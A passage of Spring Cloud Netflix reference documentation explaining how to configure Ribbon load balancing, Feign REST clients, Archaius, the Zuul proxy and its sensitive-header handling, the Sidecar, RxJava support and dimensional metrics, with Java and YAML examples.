populates the list of servers from Eureka. It also replaces the\n`IPing` interface with `NIWSDiscoveryPing` which delegates to Eureka\nto determine if a server is up. The `ServerList` that is installed by\ndefault is a `DomainExtractingServerList` and the purpose of this is\nto make physical metadata available to the load balancer without using\nAWS AMI metadata (which is what Netflix relies on). By default the\nserver list will be constructed with \"zone\" information as provided in\nthe instance metadata (so on the remote clients set\n`eureka.instance.metadataMap.zone`), and if that is missing it can use\nthe domain name from the server hostname as a proxy for zone (if the\nflag `approximateZoneFromHostname` is set). Once the zone information\nis available it can be used in a `ServerListFilter`. By default it\nwill be used to locate a server in the same zone as the client because\nthe default is a `ZonePreferenceServerListFilter`. The zone of the\nclient is determined the same way as the remote instances by default,\ni.e. via `eureka.instance.metadataMap.zone`.\n\nNOTE: The orthodox \"archaius\" way to set the client zone is via a\nconfiguration property called \"@zone\", and Spring Cloud will use that\nin preference to all other settings if it is available (note that the\nkey will have to be quoted in YAML configuration).\n\nNOTE: If there is no other source of zone data then a guess is made\nbased on the client configuration (as opposed to the instance\nconfiguration). We take `eureka.client.availabilityZones`, which is a\nmap from region name to a list of zones, and pull out the first zone\nfor the instance's own region (i.e. the `eureka.client.region`, which\ndefaults to \"us-east-1\" for comatibility with native Netflix).\n\n[[spring-cloud-ribbon-without-eureka]]\n=== Example: How to Use Ribbon Without Eureka\n\nEureka is a convenient way to abstract the discovery of remote servers\nso you don't have to hard code their URLs in clients, but if you\nprefer not to use it, Ribbon and Feign are still quite\namenable. Suppose you have declared a `@RibbonClient` for \"stores\",\nand Eureka is not in use (and not even on the classpath). The Ribbon\nclient defaults to a configured server list, and you can supply the\nconfiguration like this\n\n.application.yml\n----\nstores:\n ribbon:\n listOfServers: example.com,google.com\n----\n\n=== Example: Disable Eureka use in Ribbon\n\nSetting the property `ribbon.eureka.enabled = false` will explicitly\ndisable the use of Eureka in Ribbon.\n\n.application.yml\n----\nribbon:\n eureka:\n enabled: false\n----\n\n=== Using the Ribbon API Directly\n\nYou can also use the `LoadBalancerClient` directly. Example:\n\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private LoadBalancerClient loadBalancer;\n\n public void doStuff() {\n ServiceInstance instance = loadBalancer.choose(\"stores\");\n URI storesUri = URI.create(String.format(\"http:\/\/%s:%s\", instance.getHost(), instance.getPort()));\n \/\/ ... do something with the URI\n }\n}\n----\n\n[[spring-cloud-feign]]\n== Declarative REST Client: Feign\n\nhttps:\/\/github.com\/Netflix\/feign[Feign] is a declarative web service client. It makes writing web service clients easier. To use Feign create an interface and annotate it. It has pluggable annotation support including Feign annotations and JAX-RS annotations. Feign also supports pluggable encoders and decoders. Spring Cloud adds support for Spring MVC annotations and for using the same `HttpMessageConverters` used by default in Spring Web. Spring Cloud integrates Ribbon and Eureka to provide a load balanced http client when using Feign.\n\nExample spring boot app\n\n[source,java,indent=0]\n----\n@Configuration\n@ComponentScan\n@EnableAutoConfiguration\n@EnableEurekaClient\n@EnableFeignClients\npublic class Application {\n\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n\n}\n----\n\n.StoreClient.java\n[source,java,indent=0]\n----\n@FeignClient(\"stores\")\npublic interface StoreClient {\n @RequestMapping(method = RequestMethod.GET, value = \"\/stores\")\n List<Store> getStores();\n\n @RequestMapping(method = RequestMethod.POST, value = \"\/stores\/{storeId}\", consumes = \"application\/json\")\n Store update(@PathVariable(\"storeId\") Long storeId, Store store);\n}\n----\n\nIn the `@FeignClient` annotation the String value (\"stores\" above) is\nan arbitrary client name, which is used to create a Ribbon load\nbalancer (see <<spring-cloud-ribbon,below for details of Ribbon\nsupport>>). You can also specify a URL using the `url` attribute\n(absolute value or just a hostname). The name of the bean in the application context is the fully qualified name of the interface. An alias is also created which is the 'name' attribute plus 'FeignClient'. For the example above, `@Qualifier(\"storesFeignClient\")` could be used to reference the bean.\n\nThe Ribbon client above will want to discover the physical addresses\nfor the \"stores\" service. If your application is a Eureka client then\nit will resolve the service in the Eureka service registry. If you\ndon't want to use Eureka, you can simply configure a list of servers\nin your external configuration (see\n<<spring-cloud-ribbon-without-eureka,above for example>>).\n\n[[spring-cloud-feign-overriding-defaults]]\n=== Overriding Feign Defaults\n\nA central concept in Spring Cloud's Feign support is that of the named client. Each feign client is part of an ensemble of components that work together to contact a remote server on demand, and the ensemble has a name that you give it as an application developer using the `@FeignClient` annotation. Spring Cloud creates a new ensemble as an\n`ApplicationContext` on demand for each named client using `FeignClientsConfiguration`. This contains (amongst other things) an `feign.Decoder`, a `feign.Encoder`, and a `feign.Contract`.\n\nSpring Cloud lets you take full control of the feign client by declaring additional configuration (on top of the `FeignClientsConfiguration`) using `@FeignClient`. Example:\n\n[source,java,indent=0]\n----\n@FeignClient(name = \"stores\", configuration = FooConfiguration.class)\npublic interface StoreClient {\n \/\/..\n}\n----\n\nIn this case the client is composed from the components already in `FeignClientsConfiguration` together with any in `FooConfiguration` (where the latter will override the former).\n\nWARNING: The `FooConfiguration` has to be `@Configuration` but take care that it is not in a `@ComponentScan` for the main application context, otherwise it will be used for every `@FeignClient`. If you use `@ComponentScan` (or `@SpringBootApplication`) you need to take steps to avoid it being included (for instance put it in a separate, non-overlapping package, or specify the packages to scan explicitly in the `@ComponentScan`).\n\nNOTE: The `serviceId` attribute is now deprecated in favor of the `name` attribute.\n\nWARNING: Previously, using the `url` attribute, did not require the `name` attribute. Using `name` is now required.\n\nPlaceholders are supported in the `name` and `url` attributes.\n\n[source,java,indent=0]\n----\n@FeignClient(name = \"${feign.name}\", url = \"${feign.url}\")\npublic interface StoreClient {\n \/\/..\n}\n----\n\nSpring Cloud Netflix provides the following beans by default for feign (`BeanType` beanName: `ClassName`):\n\n* `Decoder` feignDecoder: `ResponseEntityDecoder` (which wraps a `SpringDecoder`)\n* `Encoder` feignEncoder: `SpringEncoder`\n* `Logger` feignLogger: `Slf4jLogger`\n* `Contract` feignContract: `SpringMvcContract`\n* `Feign.Builder` feignBuilder: `HystrixFeign.Builder`\n\nSpring Cloud Netflix _does not_ provide the following beans by default for feign, but still looks up beans of these types from the application context to create the feign client:\n\n* `Logger.Level`\n* `Retryer`\n* `ErrorDecoder`\n* `Request.Options`\n* `Collection<RequestInterceptor>`\n\nCreating a bean of one of those type and placing it in a `@FeignClient` configuration (such as `FooConfiguration` above) allows you to override each one of the beans described. Example:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n public Contract feignContract() {\n return new feign.Contract.Default();\n }\n\n @Bean\n public BasicAuthRequestInterceptor basicAuthRequestInterceptor() {\n return new BasicAuthRequestInterceptor(\"user\", \"password\");\n }\n}\n----\n\nThis replaces the `SpringMvcContract` with `feign.Contract.Default` and adds a `RequestInterceptor` to the collection of `RequestInterceptor`.\n\nDefault configurations can be specified in the `@EnableFeignClients` attribute `defaultConfiguration` in a similar manner as described above. The difference is that this configuration will apply to _all_ feign clients.\n\n[[spring-cloud-feign-hystrix]]\n=== Feign Hystrix Support\n\nIf Hystrix is on the classpath, by default Feign will wrap all methods with a circuit breaker. Returning a `com.netflix.hystrix.HystrixCommand` is also available. This lets you use reactive patterns (with a call to `.toObservable()` or `.observe()` or asynchronous use (with a call to `.queue()`).\n\nTo disable Hystrix support for Feign, set `feign.hystrix.enabled=false`.\n\nTo disable Hystrix support on a per-client basis create a vanilla `Feign.Builder` with the \"prototype\" scope, e.g.:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n\t@Scope(\"prototype\")\n\tpublic Feign.Builder feignBuilder() {\n\t\treturn Feign.builder();\n\t}\n}\n----\n\n[[spring-cloud-feign-hystrix-fallback]]\n=== Feign Hystrix Fallbacks\n\nHystrix supports the notion of a fallback: a default code path that is executed when they circuit is open or there is an error. To enable fallbacks for a given `@FeignClient` set the `fallback` attribute to the class name that implements the fallback.\n\n[source,java,indent=0]\n----\n@FeignClient(name = \"hello\", fallback = HystrixClientFallback.class)\nprotected interface HystrixClient {\n @RequestMapping(method = RequestMethod.GET, value = \"\/hello\")\n Hello iFailSometimes();\n}\n\nstatic class HystrixClientFallback implements HystrixClient {\n @Override\n public Hello iFailSometimes() {\n return new Hello(\"fallback\");\n }\n}\n----\n\nWARNING: There is a limitation with the implementation of fallbacks in Feign and how Hystrix fallbacks work. Fallbacks are currently not supported for methods that return `com.netflix.hystrix.HystrixCommand` and `rx.Observable`.\n\n[[spring-cloud-feign-inheritance]]\n=== Feign Inheritance Support\n\nFeign supports boilerplate apis via single-inheritance interfaces.\nThis allows grouping common operations into convenient base interfaces.\n\n.UserService.java\n[source,java,indent=0]\n----\npublic interface UserService {\n\n @RequestMapping(method = RequestMethod.GET, value =\"\/users\/{id}\")\n User getUser(@PathVariable(\"id\") long id);\n}\n----\n\n.UserResource.java\n[source,java,indent=0]\n----\n@RestController\npublic class UserResource implements UserService {\n\n}\n----\n\n.UserClient.java\n[source,java,indent=0]\n----\npackage project.user;\n\n@FeignClient(\"users\")\npublic interface UserClient extends UserService {\n\n}\n----\n\nNOTE: It is generally not advisable to share an interface between a\nserver and a client. It introduces tight coupling, and also actually\ndoesn't work with Spring MVC in its current form (method parameter\nmapping is not inherited).\n\n=== Feign request\/response compression\n\nYou may consider enabling the request or response GZIP compression for your\nFeign requests. You can do this by enabling one of the properties:\n\n[source,java]\n----\nfeign.compression.request.enabled=true\nfeign.compression.response.enabled=true\n----\n\nFeign request compression gives you settings similar to what you may set for your web server:\n\n[source,java]\n----\nfeign.compression.request.enabled=true\nfeign.compression.request.mime-types=text\/xml,application\/xml,application\/json\nfeign.compression.request.min-request-size=2048\n----\n\nThese properties allow you to be selective about the compressed media types and minimum request threshold length.\n\n=== Feign logging\n\nA logger is created for each Feign client created. By default the name of the logger is the full class name of the interface used to create the Feign client. Feign logging only responds to the `DEBUG` level.\n\n.application.yml\n\n[source,yaml]\n----\nlogging.level.project.user.UserClient: DEBUG\n----\n\nThe `Logger.Level` object that you may configure per client, tells Feign how much to log. Choices are:\n\n* `NONE`, No logging (*DEFAULT*).\n* `BASIC`, Log only the request method and URL and the response status code and execution time.\n* `HEADERS`, Log the basic information along with request and response headers.\n* `FULL`, Log the headers, body, and metadata for both requests and responses.\n\nFor example, the following would set the `Logger.Level` to `FULL`:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n Logger.Level feignLoggerLevel() {\n return Logger.Level.FULL;\n }\n}\n----\n\n== External Configuration: Archaius\n\nhttps:\/\/github.com\/Netflix\/archaius[Archaius] is the Netflix client side configuration library. It is the library used by all of the Netflix OSS components for configuration. Archaius is an extension of the http:\/\/commons.apache.org\/proper\/commons-configuration[Apache Commons Configuration] project. It allows updates to configuration by either polling a source for changes or for a source to push changes to the client. Archaius uses Dynamic<Type>Property classes as handles to properties.\n\n.Archaius Example\n[source,java]\n----\nclass ArchaiusTest {\n DynamicStringProperty myprop = DynamicPropertyFactory\n .getInstance()\n .getStringProperty(\"my.prop\");\n\n void doSomething() {\n OtherClass.someMethod(myprop.get());\n }\n}\n----\n\nArchaius has its own set of configuration files and loading priorities. Spring applications should generally not use Archaius directly, but the need to configure the Netflix tools natively remains. Spring Cloud has a Spring Environment Bridge so Archaius can read properties from the Spring Environment. This allows Spring Boot projects to use the normal configuration toolchain, while allowing them to configure the Netflix tools, for the most part, as documented.\n\n== Router and Filter: Zuul\n\nRouting in an integral part of a microservice architecture. For example, `\/` may be mapped to your web application, `\/api\/users` is mapped to the user service and `\/api\/shop` is mapped to the shop service. https:\/\/github.com\/Netflix\/zuul[Zuul] is a JVM based router and server side load balancer by Netflix.\n\nhttp:\/\/www.slideshare.net\/MikeyCohen1\/edge-architecture-ieee-international-conference-on-cloud-engineering-32240146\/27[Netflix uses Zuul] for the following:\n\n* Authentication\n* Insights\n* Stress Testing\n* Canary Testing\n* Dynamic Routing\n* Service Migration\n* Load Shedding\n* Security\n* Static Response handling\n* Active\/Active traffic management\n\nZuul's rule engine allows rules and filters to be written in essentially any JVM language, with built in support for Java and Groovy.\n\nNOTE: The configuration property `zuul.max.host.connections` has been replaced by two new properties, `zuul.host.maxTotalConnections` and `zuul.host.maxPerRouteConnections` which default to 200 and 20 respectively.\n\n[[netflix-zuul-reverse-proxy]]\n=== Embedded Zuul Reverse Proxy\n\nSpring Cloud has created an embedded Zuul proxy to ease the\ndevelopment of a very common use case where a UI application wants to\nproxy calls to one or more back end services. This feature is useful\nfor a user interface to proxy to the backend services it requires,\navoiding the need to manage CORS and authentication concerns\nindependently for all the backends.\n\nTo enable it, annotate a Spring Boot main class with\n`@EnableZuulProxy`, and this forwards local calls to the appropriate\nservice. By convention, a service with the ID \"users\", will\nreceive requests from the proxy located at `\/users` (with the prefix\nstripped). The proxy uses Ribbon to locate an instance to forward to\nvia discovery, and all requests are executed in a hystrix command, so\nfailures will show up in Hystrix metrics, and once the circuit is open\nthe proxy will not try to contact the service.\n\nNOTE: the Zuul starter does not include a discovery client, so for\nroutes based on service IDs you need to provide one of those \non the classpath as well (e.g. Eureka is one choice).\n\nTo skip having a service automatically added, set\n`zuul.ignored-services` to a list of service id patterns. If a service\nmatches a pattern that is ignored, but also included in the explicitly\nconfigured routes map, then it will be unignored. Example:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n ignoredServices: '*'\n routes:\n users: \/myusers\/**\n----\n\nIn this example, all services are ignored *except* \"users\".\n\nTo augment or change\nthe proxy routes, you can add external configuration like the\nfollowing:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users: \/myusers\/**\n----\n\nThis means that http calls to \"\/myusers\" get forwarded to the \"users\"\nservice (for example \"\/myusers\/101\" is forwarded to \"\/101\").\n\nTo get more fine-grained control over a route you can specify the path\nand the serviceId independently:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n serviceId: users_service\n----\n\nThis means that http calls to \"\/myusers\" get forwarded to the\n\"users_service\" service. The route has to have a \"path\" which can be\nspecified as an ant-style pattern, so \"\/myusers\/{asterisk}\" only matches one\nlevel, but \"\/myusers\/{all}\" matches hierarchically.\n\nThe location of the backend can be specified as either a \"serviceId\"\n(for a service from discovery) or a \"url\" (for a physical location), e.g.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n url: http:\/\/example.com\/users_service\n----\n\nThese simple url-routes don't get executed as a `HystrixCommand` nor can you loadbalance multiple URLs with Ribbon.\nTo achieve this, specify a service-route and configure a Ribbon client for the\nserviceId (this currently requires disabling Eureka support in Ribbon:\nsee <<spring-cloud-ribbon-without-eureka,above for more information>>), e.g.\n\n.application.yml\n[source,yaml]\n----\nzuul:\n routes:\n users:\n path: \/myusers\/**\n serviceId: users\n\nribbon:\n eureka:\n enabled: false\n\nusers:\n ribbon:\n listOfServers: example.com,google.com\n----\n\nYou can provide convention between serviceId and routes using\nregexmapper. It uses regular expression named groups to extract\nvariables from serviceId and inject them into a route pattern.\n\n.ApplicationConfiguration.java\n[source,java]\n----\n@Bean\npublic PatternServiceRouteMapper serviceRouteMapper() {\n return new PatternServiceRouteMapper(\n \"(?<name>^.+)-(?<version>v.+$)\",\n \"${version}\/${name}\");\n}\n----\n\nThis means that a serviceId \"myusers-v1\" will be mapped to route\n\"\/v1\/myusers\/{all}\". Any regular expression is accepted but all named\ngroups must be present in both servicePattern and routePattern. If\nservicePattern does not match a serviceId, the default behavior is\nused. In the example above, a serviceId \"myusers\" will be mapped to route\n\"\/myusers\/{all}\" (no version detected) This feature is disable by\ndefault and only applies to discovered services.\n\nTo add a prefix to all mappings, set `zuul.prefix` to a value, such as\n`\/api`. The proxy prefix is stripped from the request before the\nrequest is forwarded by default (switch this behaviour off with\n`zuul.stripPrefix=false`). You can also switch off the stripping of\nthe service-specific prefix from individual routes, e.g.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n stripPrefix: false\n----\n\nIn this example, requests to \"\/myusers\/101\" will be forwarded to \"\/myusers\/101\" on the \"users\" service.\n\nThe `zuul.routes` entries actually bind to an object of type `ZuulProperties`. If you\nlook at the properties of that object you will see that it also has a \"retryable\" flag.\nSet that flag to \"true\" to have the Ribbon client automatically retry failed requests\n(and if you need to you can modify the parameters of the retry operations using\nthe Ribbon client configuration).\n\nThe `X-Forwarded-Host` header is added to the forwarded requests by\ndefault. To turn it off set `zuul.addProxyHeaders = false`. The\nprefix path is stripped by default, and the request to the backend\npicks up a header \"X-Forwarded-Prefix\" (\"\/myusers\" in the examples\nabove).\n\nAn application with `@EnableZuulProxy` could act as a standalone\nserver if you set a default route (\"\/\"), for example `zuul.route.home:\n\/` would route all traffic (i.e. \"\/{all}\") to the \"home\" service.\n\nIf more fine-grained ignoring is needed, you can specify specific patterns to ignore.\nThese patterns are evaluated at the start of the route location process, which\nmeans prefixes should be included in the pattern to warrant a match. Ignored patterns\nspan all services and supersede any other route specification.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n ignoredPatterns: \/**\/admin\/**\n routes:\n users: \/myusers\/**\n----\n\nThis means that all calls such as \"\/myusers\/101\" will be forwarded to \"\/101\" on the \"users\" service.\nBut calls including \"\/admin\/\" will not resolve.\n\n=== Cookies and Sensitive Headers\n\nIt's OK to share headers between services in the same system, but you\nprobably don't want sensitive headers leaking downstream into external\nservers. You can specify a list of ignored headers as part of the\nroute configuration. Cookies play a special role because they have\nwell-defined semantics in browsers, and they are always to be treated\nas sensitive. If the consumer of your proxy is a browser, then cookies\nfor downstream services also cause problems for the user because they\nall get jumbled up (all downstream services look like they come from\nthe same place).\n\nIf you are careful with the design of your services, for example if\nonly one of the downstream services sets cookies, then you might be\nable to let them flow from the backend all the way up to the\ncaller. Also, if your proxy sets cookies and all your back end\nservices are part of the same system, it can be natural to simply\nshare them (and for instance use Spring Session to link them up to some\nshared state). Other than that, any cookies that get set by downstream\nservices are likely to be not very useful to the caller, so it is\nrecommended that you make (at least) \"Set-Cookie\" and \"Cookie\" into\nsensitive headers for routes that are not part of your domain. Even\nfor routes that *are* part of your domain, try to think carefully\nabout what it means before allowing cookies to flow between them and\nthe proxy.\n\nThe sensitive headers can be configured as a comma-separated list per\nroute, e.g.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n sensitiveHeaders: Cookie,Set-Cookie,Authorization\n url: https:\/\/downstream\n----\n\nSensitive headers can also be set globally by setting `zuul.sensitiveHeaders`. If `sensitiveHeaders` is set on a route, this will override the global `sensitiveHeaders` setting.\n\nNOTE: this is the default value for `sensitiveHeaders`, so you don't\nneed to set it unless you want it to be different. N.B. this is new in\nSpring Cloud Netflix 1.1 (in 1.0 the user had no control over headers\nand all cookies flow in both directions).\n\nIn addition to the per-route sensitive headers, you can set a global\nvalue for `zuul.ignoredHeaders` for values that should be discarded\n(both request and response) during interactions with downstream\nservices. By default these are empty, if Spring Security is not on the\nclasspath, and otherwise they are initialized to a set of well-known\n\"security\" headers (e.g. involving caching) as specified by Spring\nSecurity. The assumption in this case is that the downstream services\nmight add these headers too, and we want the values from the proxy.\n\n=== The Routes Endpoint\n\nIf you are using `@EnableZuulProxy` with tha Spring Boot Actuator you\nwill enable (by default) an additional endpoint, available via HTTP as\n`\/routes`. A GET to this endpoint will return a list of the mapped\nroutes. A POST will force a refresh of the existing routes (e.g. in\ncase there have been changes in the service catalog).\n\nNOTE: the routes should respond automatically to changes in the\nservice catalog, but the POST to \/routes is a way to force the change\nto happen immediately.\n\n=== Strangulation Patterns and Local Forwards\n\nA common pattern when migrating an existing application or API is to\n\"strangle\" old endpoints, slowly replacing them with different\nimplementations. The Zuul proxy is a useful tool for this because you\ncan use it to handle all traffic from clients of the old endpoints,\nbut redirect some of the requests to new ones.\n\nExample configuration:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n first:\n path: \/first\/**\n url: http:\/\/first.example.com\n second:\n path: \/second\/**\n url: forward:\/second\n third:\n path: \/third\/**\n url: forward:\/3rd\n legacy:\n path: \/**\n url: http:\/\/legacy.example.com\n----\n\nIn this example we are strangling the \"legacy\" app which is mapped to\nall requests that do not match one of the other patterns. Paths in\n`\/first\/{all}` have been extracted into a new service with an external\nURL. And paths in `\/second\/{all}` are forwared so they can be handled\nlocally, e.g. with a normal Spring `@RequestMapping`. Paths in\n`\/third\/{all}` are also forwarded, but with a different prefix\n(i.e. `\/third\/foo` is forwarded to `\/3rd\/foo`).\n\nNOTE: The ignored patterns aren't completely ignored, they just\naren't handled by the proxy (so they are also effectively forwarded\nlocally).\n\n=== Uploading Files through Zuul\n\nIf you `@EnableZuulProxy` you can use the proxy paths to\nupload files and it should just work as long as the files\nare small. For large files there is an alternative path\nwhich bypasses the Spring `DispatcherServlet` (to\navoid multipart processing) in \"\/zuul\/{asterisk}\". I.e. if\n`zuul.routes.customers=\/customers\/{all}` then you can\nPOST large files to \"\/zuul\/customers\/*\". The servlet\npath is externalized via `zuul.servletPath`. Extremely\nlarge files will also require elevated timeout settings\nif the proxy route takes you through a Ribbon load\nbalancer, e.g.\n\n.application.yml\n[source,yaml]\n----\nhystrix.command.default.execution.isolation.thread.timeoutInMilliseconds: 60000\nribbon:\n ConnectTimeout: 3000\n ReadTimeout: 60000\n----\n\nNote that for streaming to work with large files, you need to use chunked encoding in the request (which some browsers\ndo not do by default). E.g. on the command line:\n\n----\n$ curl -v -H \"Transfer-Encoding: chunked\" \\\n -F \"file=@mylarge.iso\" localhost:9999\/zuul\/simple\/file\n----\n\n=== Plain Embedded Zuul\n\nYou can also run a Zuul server without the proxying, or switch on parts of the proxying platform selectively, if you\nuse `@EnableZuulServer` (instead of `@EnableZuulProxy`). Any beans that you add to the application of type `ZuulFilter`\nwill be installed automatically, as they are with `@EnableZuulProxy`, but without any of the proxy filters being added\nautomatically.\n\nIn this case the routes into the Zuul server are still specified by\nconfiguring \"zuul.routes.{asterisk}\", but there is no service\ndiscovery and no proxying, so the \"serviceId\" and \"url\" settings are\nignored. For example:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n api: \/api\/**\n----\n\nmaps all paths in \"\/api\/{all}\" to the Zuul filter chain.\n\n=== Disable Zuul Filters\n\nZuul for Spring Cloud comes with a number of `ZuulFilter` beans enabled by default\nin both proxy and server mode. See https:\/\/github.com\/spring-cloud\/spring-cloud-netflix\/tree\/master\/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters[the zuul filters package] for the\npossible filters that are enabled. If you want to disable one, simply set\n`zuul.<SimpleClassName>.<filterType>.disable=true`. By convention, the package after\n`filters` is the Zuul filter type. For example to disable\n`org.springframework.cloud.netflix.zuul.filters.post.SendResponseFilter` set\n`zuul.SendResponseFilter.post.disable=true`.\n\n=== Polyglot support with Sidecar\n\nDo you have non-jvm languages you want to take advantage of Eureka, Ribbon and\nConfig Server? The Spring Cloud Netflix Sidecar was inspired by\nhttps:\/\/github.com\/Netflix\/Prana[Netflix Prana]. It includes a simple http api\nto get all of the instances (ie host and port) for a given service. You can\nalso proxy service calls through an embedded Zuul proxy which gets its route\nentries from Eureka. The Spring Cloud Config Server can be accessed directly\nvia host lookup or through the Zuul Proxy. The non-jvm app should implement\na health check so the Sidecar can report to eureka if the app is up or down.\n\nTo enable the Sidecar, create a Spring Boot application with `@EnableSidecar`.\nThis annotation includes `@EnableCircuitBreaker`, `@EnableDiscoveryClient`,\nand `@EnableZuulProxy`. Run the resulting application on the same host as the\nnon-jvm application.\n\nTo configure the side car add `sidecar.port` and `sidecar.health-uri` to `application.yml`.\nThe `sidecar.port` property is the port the non-jvm app is listening on. This\nis so the Sidecar can properly register the app with Eureka. The `sidecar.health-uri`\nis a uri accessible on the non-jvm app that mimicks a Spring Boot health\nindicator. It should return a json document like the following:\n\n.health-uri-document\n[source,json]\n----\n{\n \"status\":\"UP\"\n}\n----\n\nHere is an example application.yml for a Sidecar application:\n\n.application.yml\n[source,yaml]\n----\nserver:\n port: 5678\nspring:\n application:\n name: sidecar\n\nsidecar:\n port: 8000\n health-uri: http:\/\/localhost:8000\/health.json\n----\n\nThe api for the `DiscoveryClient.getInstances()` method is `\/hosts\/{serviceId}`.\nHere is an example response for `\/hosts\/customers` that returns two instances on\ndifferent hosts. This api is accessible to the non-jvm app (if the sidecar is\non port 5678) at `http:\/\/localhost:5678\/hosts\/{serviceId}`.\n\n.\/hosts\/customers\n[source,json]\n----\n[\n {\n \"host\": \"myhost\",\n \"port\": 9000,\n \"uri\": \"http:\/\/myhost:9000\",\n \"serviceId\": \"CUSTOMERS\",\n \"secure\": false\n },\n {\n \"host\": \"myhost2\",\n \"port\": 9000,\n \"uri\": \"http:\/\/myhost2:9000\",\n \"serviceId\": \"CUSTOMERS\",\n \"secure\": false\n }\n]\n----\n\nThe Zuul proxy automatically adds routes for each service known in eureka to\n`\/<serviceId>`, so the customers service is available at `\/customers`. The\nNon-jvm app can access the customer service via `http:\/\/localhost:5678\/customers`\n(assuming the sidecar is listening on port 5678).\n\nIf the Config Server is registered with Eureka, non-jvm application can access\nit via the Zuul proxy. If the serviceId of the ConfigServer is `configserver`\nand the Sidecar is on port 5678, then it can be accessed at\nhttp:\/\/localhost:5678\/configserver\n\nNon-jvm app can take advantage of the Config Server's ability to return YAML\ndocuments. For example, a call to http:\/\/sidecar.local.spring.io:5678\/configserver\/default-master.yml\nmight result in a YAML document like the following\n\n[source,yaml]\n----\neureka:\n client:\n serviceUrl:\n defaultZone: http:\/\/localhost:8761\/eureka\/\n password: password\ninfo:\n description: Spring Cloud Samples\n url: https:\/\/github.com\/spring-cloud-samples\n----\n\n[[netflix-rxjava-springmvc]]\n== RxJava with Spring MVC\nSpring Cloud Netflix includes the https:\/\/github.com\/ReactiveX\/RxJava[RxJava].\n\n> RxJava is a Java VM implementation of http:\/\/reactivex.io\/[Reactive Extensions]: a library for composing asynchronous and event-based programs by using observable sequences.\n\nSpring Cloud Netflix provides support for returning `rx.Single` objects from Spring MVC Controllers. It also supports using `rx.Observable` objects for https:\/\/en.wikipedia.org\/wiki\/Server-sent_events[Server-sent events (SSE)]. This can be very convenient if your internal APIs are already built using RxJava (see <<spring-cloud-feign-hystrix>> for examples).\n\nHere are some examples of using `rx.Single`:\n\n[source,java]\n----\ninclude::..\/..\/..\/..\/spring-cloud-netflix-core\/src\/test\/java\/org\/springframework\/cloud\/netflix\/rx\/SingleReturnValueHandlerTest.java[tags=rx_single,indent=0]\n----\n\nIf you have an `Observable`, rather than a single, you can use `.toSingle()` or `.toList().toSingle()`. Here are some examples:\n\n[source,java]\n----\ninclude::..\/..\/..\/..\/spring-cloud-netflix-core\/src\/test\/java\/org\/springframework\/cloud\/netflix\/rx\/ObservableReturnValueHandlerTest.java[tags=rx_observable,indent=0]\n----\n\nIf you have a streaming endpoint and client, SSE could be an option. To convert `rx.Observable` to a Spring `SseEmitter` use `RxResponse.sse()`. Here are some examples:\n\n[source,java]\n----\ninclude::..\/..\/..\/..\/spring-cloud-netflix-core\/src\/test\/java\/org\/springframework\/cloud\/netflix\/rx\/ObservableSseEmitterTest.java[tags=rx_observable_sse,indent=0]\n----\n\n[[netflix-metrics]]\n== Metrics: Spectator, Servo, and Atlas\n\nWhen used together, Spectator\/Servo and Atlas provide a near real-time operational insight platform.\n\nSpectator and Servo are Netflix's metrics collection libraries. Atlas is a Netflix metrics backend to manage dimensional time series data.\n\nServo served Netflix for several years and is still usable, but is gradually being phased out in favor of Spectator, which is only designed to work with Java 8. Spring Cloud Netflix provides support for both, but Java 8 based applications are encouraged to use Spectator.\n\n=== Dimensional vs. Hierarchical Metrics\n\nSpring Boot Actuator metrics are hierarchical and metrics are separated only by name. These names often follow a naming convention that embeds key\/value attribute pairs (dimensions) into the name separated by periods. Consider the following metrics for two endpoints, root and star-star:\n\n[source,json]\n----\n{\n \"counter.status.200.root\": 20,\n \"counter.status.400.root\": 3,\n \"counter.status.200.star-star\": 5,\n}\n----\n\nThe first metric gives us a normalized count of successful requests against the root endpoint per unit of time. But what if the system had 20 endpoints and you want to get a count of successful requests against all the endpoints? Some hierarchical metrics backends would allow you to specify a wild card such as `counter.status.200.*` that would read all 20 metrics and aggregate the results. Alternatively, you could provide a `HandlerInterceptorAdapter` that intercepts and records a metric like `counter.status.200.all` for all successful requests irrespective of the endpoint, but now you must write 20+1 different metrics. Similarly if you want to know the total number of successful requests for all endpoints in the service, you could specify a wild card such as `counter.status.2*.*`.\n\nEven in the presence of wildcarding support on a hierarchical metrics backend, naming consistency can be difficult. Specifically the position of these tags in the name string can slip with time, breaking queries. For example, suppose we add an additional dimension to the hierarchical metrics above for HTTP method. Then `counter.status.200.root` becomes `counter.status.200.method.get.root`, etc. Our `counter.status.200.*` suddenly no longer has the same semantic meaning. Furthermore, if the new dimension is not applied uniformly across the codebase, certain queries may become impossible. This can quickly get out of hand.\n\nNetflix metrics are tagged (a.k.a. dimensional). Each metric has a name, but this single named metric can contain multiple statistics and 'tag' key\/value pairs that allows more querying flexibility. In fact, the statistics themselves are recorded in a special tag.\n\nRecorded with Netflix Servo or Spectator, a timer for the root endpoint described above contains 4 statistics per status code, where the count statistic is identical to Spring Boot Actuator's counter. In the event that we have encountered an HTTP 200 and 400 thus far, there will be 8 available data points:\n\n[source,json]\n----\n{\n \"root(status=200,stastic=count)\": 20,\n \"root(status=200,stastic=max)\": 0.7265630630000001,\n \"root(status=200,stastic=totalOfSquares)\": 0.04759702862580789,\n \"root(status=200,stastic=totalTime)\": 0.2093076914666667,\n \"root(status=400,stastic=count)\": 1,\n \"root(status=400,stastic=max)\": 0,\n \"root(status=400,stastic=totalOfSquares)\": 0,\n \"root(status=400,stastic=totalTime)\": 0,\n}\n----\n\n=== Default Metrics Collection\n\nWithout any additional dependencies or configuration, 